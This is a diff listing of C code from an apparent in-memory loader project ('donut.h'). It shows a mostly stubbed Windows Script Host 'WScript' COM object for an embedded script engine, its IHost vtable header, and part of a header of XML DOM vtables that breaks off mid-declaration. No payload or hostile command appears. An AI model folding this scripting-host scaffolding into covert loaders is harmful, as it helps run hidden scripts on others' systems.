155 // The dispatch function DispInvoke provides a standard implementation of Invoke.
156 static HRESULT WINAPI Host_Invoke(
157 IHost *iface, DISPID dispIdMember, REFIID riid,
158 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
159 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
160
161 DPRINT("WScript::Invoke");
162
163 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
164 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
165 pVarResult, pExcepInfo, puArgErr);
166
167 DPRINT("HRESULT : %08lx", hr);
168
169 return hr;
170 }
171
172 // Returns the name of the WScript object (the host executable file).
173 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
174 DPRINT("WScript::Name");
175
176 return S_OK;
177 }
178
179 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
180 DPRINT("WScript::Application");
181
182 return E_NOTIMPL;
183 }
184
185 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
186 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
187 DPRINT("WScript::FullName");
188
189 return E_NOTIMPL;
190 }
191
192 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
193 DPRINT("WScript::Path");
194
195 return E_NOTIMPL;
196 }
197
198 // Gets the script mode, or identifies the script mode.
199 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
200 DPRINT("WScript::get_Interactive");
201
202 return E_NOTIMPL;
203 }
204
205 // Sets the script mode, or identifies the script mode.
206 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
207 DPRINT("WScript::put_Interactive");
208
209 return E_NOTIMPL;
210 }
211
212 // Forces script execution to stop at any time.
213 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
214 DPRINT("WScript::Quit(%i)", ExitCode);
215
216 // if you know of a better way to do this..let me know.
217 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
218
219 return S_OK;
220 }
221
222 // Returns the file name of the currently running script.
223 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
224 DPRINT("WScript::ScriptName");
225
226 return E_NOTIMPL;
227 }
228
229 // Returns the full path of the currently running script.
230 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
231 DPRINT("WScript::ScriptFullName");
232
233 return E_NOTIMPL;
234 }
235
236 // Returns the WshArguments object (a collection of arguments).
237 static HRESULT WINAPI Host_get_Arguments(
238 IHost *iface, void **out_Arguments) { // IArguments2
239 DPRINT("WScript::Arguments");
240
241 return E_NOTIMPL;
242 }
243
244 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
245 DPRINT("WScript::Version");
246
247 return E_NOTIMPL;
248 }
249
250 // Returns the Windows Script Host build version number.
251 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
252 DPRINT("WScript::BuildVersion");
253
254 return E_NOTIMPL;
255 }
256
257 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
258 DPRINT("WScript::get_Timeout");
259
260 return E_NOTIMPL;
261 }
262
263 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
264 DPRINT("WScript::put_Timeout");
265
266 return E_NOTIMPL;
267 }
268
269 // Connects the object's event sources to functions with a given prefix.
270 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
271 IDispatch **out_Dispatch) {
272 DPRINT("WScript::CreateObject");
273
274 return E_NOTIMPL;
275 }
276
277 // Outputs text to either a message box or the command console window.
278 static HRESULT WINAPI Host_Echo(
279 IHost *iface, SAFEARRAY *args) {
280 DPRINT("WScript::Echo");
281
282 return E_NOTIMPL;
283 }
284
285 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
286 static HRESULT WINAPI Host_GetObject(
287 IHost *iface, BSTR Pathname, BSTR ProgID,
288 BSTR Prefix, IDispatch **out_Dispatch) {
289 DPRINT("WScript::GetObject");
290
291 return E_NOTIMPL;
292 }
293
294 // Disconnects a connected object's event sources.
295 static HRESULT WINAPI Host_DisconnectObject(
296 IHost *iface, IDispatch *Object) {
297 DPRINT("WScript::DisconnectObject");
298
299 return E_NOTIMPL;
300 }
301
302 // Suspends script execution for a specified length of time, then continues execution.
303 static HRESULT WINAPI Host_Sleep(
304 IHost *iface, LONG Time) {
305
306 DPRINT("WScript::Sleep");
307 iface->inst->api.Sleep((DWORD)Time);
308
309 return S_OK;
310 }
311
312 // Connects the object's event sources to functions with a given prefix.
313 static HRESULT WINAPI Host_ConnectObject(
314 IHost *iface, IDispatch *Object, BSTR Prefix) {
315 DPRINT("WScript::ConnectObject");
316
317 return E_NOTIMPL;
318 }
319
320 // Exposes the read-only input stream for the current script.
321 static HRESULT WINAPI Host_get_StdIn(
322 IHost *iface, void **ppts) { // ppts is ITextStream
323 DPRINT("WScript::StdIn");
324
325 return E_NOTIMPL;
326 }
327
328 // Exposes the write-only output stream for the current script.
329 static HRESULT WINAPI Host_get_StdOut(
330 IHost *iface, void **ppts) { // ppts is ITextStream
331 DPRINT("WScript::StdOut");
332
333 return E_NOTIMPL;
334 }
335
336 // Exposes the write-only error output stream for the current script.
337 static HRESULT WINAPI Host_get_StdErr(
338 IHost *iface, void **ppts) { // ppts is ITextStream
339 DPRINT("WScript::StdErr");
340
341 return E_NOTIMPL;
342 }
+284
-0
loader/wscript.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
+588
-0
loader/xmldom.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
377 IXMLDOMDocument * This,
378 IXMLDOMNode **definitionNode);
379
380 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
381 IXMLDOMDocument * This,
382 VARIANT *typedValue);
383
384 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
385 IXMLDOMDocument * This,
386 VARIANT typedValue);
387
388 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
389 IXMLDOMDocument * This,
390 VARIANT *dataTypeName);
391
392 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
393 IXMLDOMDocument * This,
394 BSTR dataTypeName);
395
396 HRESULT ( STDMETHODCALLTYPE *get_xml )(
397 IXMLDOMDocument * This,
398 BSTR *xmlString);
399
400 HRESULT ( STDMETHODCALLTYPE *transformNode )(
401 IXMLDOMDocument * This,
402 IXMLDOMNode *stylesheet,
403 BSTR *xmlString);
404
405 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
406 IXMLDOMDocument * This,
407 BSTR queryString,
408 IXMLDOMNodeList **resultList);
409
410 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
411 IXMLDOMDocument * This,
412 BSTR queryString,
413 IXMLDOMNode **resultNode);
414
415 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
416 IXMLDOMDocument * This,
417 VARIANT_BOOL *isParsed);
418
419 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
420 IXMLDOMDocument * This,
421 BSTR *namespaceURI);
422
423 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
